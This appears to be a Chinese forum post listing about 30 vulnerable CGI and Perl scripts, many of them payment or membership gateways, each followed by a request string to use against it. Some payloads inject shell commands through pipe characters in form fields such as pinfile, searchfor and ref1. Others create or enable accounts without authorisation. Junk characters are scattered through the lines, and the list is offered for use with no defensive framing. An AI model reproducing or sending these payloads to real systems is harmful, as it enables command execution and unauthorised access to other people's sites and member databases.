Cgi-bin 30个漏洞＋使用方法

admin

==============================

1 i# o3 S1 _" |/smspass.pl
) S5 G  O* G2 w; M: uusername=username&password=password

/index.cgi
wei=ren&gen=command
+ ?" z0 r0 W: r# ~5 Z, U" f, f
/passmaster.cgi
Action=Add&Username=Username&Password=Password

9 l% H+ E# U/ k0 s, @$ u) m/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
0 g; P/ Y- d. O* O* }
; T6 [' O- l# m; O7 X7 n3 f# U/form.cgi
% e2 f) b6 n7 E  Q# {' Oname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
0 X* A, e8 v' `- d% ?% z: }user=username&pass=Password&confirm=Password
# ^5 Y( b( ]  ^: F; w) K
5 B8 e( W; j. g/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|
. w4 b, q) t$ e5 }0 B
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
* l; A* ?4 X5 L
/verotelrum.pl
9 j# _) Q4 P( Y% a& s/ a. \" cvercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|
/ W& r* w8 e8 Q/ C3 C4 y
8 s9 I, l* p6 R' o: ]/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

6 m3 G; M! h  A1 h/gx9passwd.cgi
2 v2 D9 `! w) q/ Zcmd=ADD&user=username&pass=password
  y" }# J5 \& P* V, l* {
, o7 O8 R: W1 J1 f/probecontrol.cgi
command=enable&username=username&password=password

2 x" \5 B: b' W  H/recon.cgi
, J' ]' N2 Q* _+ Z, L/ Csearchoption=3&searchfor=echo;ls -la;exit

0 M' S2 s: h' Y- m& W* E, x/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
' Q9 q# a7 }$ ~7 K) Rcmd=ADD&user=username&pass=password

/ibill*.pl
+ }' T3 e# m% `reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
% O" ~6 f* Z; @; X* q0 w- a1 Hcommand=add_member&username=username(EMAIL)&password=password(DES)
- X2 s1 W! p- m2 h" Z# b
- y. h6 w5 S2 Y( G/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
! L, _) V$ }$ \+ O+ o/ k
8 B" @  O$ P1 _/usercontrol.cgi
command=enable&username=USER&password=PASS

0 F9 l: D/ F, |$ E/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
0 U3 ~" w- M( D
/addusr.pl
' j" X+ M* _+ Z5 Quser=USER&pass=PASS&confirm=PASS
  c( k/ b( Y8 m
/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
; o: ?. q1 s- w
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
3 n, K7 l- m1 M, ~) B
9 K$ g* d6 U$ H& D9 K, I/af.cgi
+ x0 z, i, [  _9 ^0 M" {2 O7 f/env.cgi
( U1 ?; `% M: v; N- P* aADD+;echo;pwd;exit
( X' \) e& t- B  c2 E  Z4 b9 D
% Y; x. ?4 V4 G6 T' C/count.cgi
pinfile=|echo;pwd;exit|
+ o* E  n2 f: T  L2 A: m' }* i& L
7 u: X- V0 |8 z' E/recon.cgi
1 {) w2 D; |7 a- K, V9 qsearchoption=1&searchfor=|echo;ls%20-al;exit|
. y: n8 D4 O& F2 M  f
& B* }' l1 [# I# _/add.cgi
, N2 n; ~7 V! T8 F1 f& susername=username&password=password&expire=30
( E* q. |* V7 J% \( H
==============================
4 M  T; r% J/ X2 y' C9 c) ?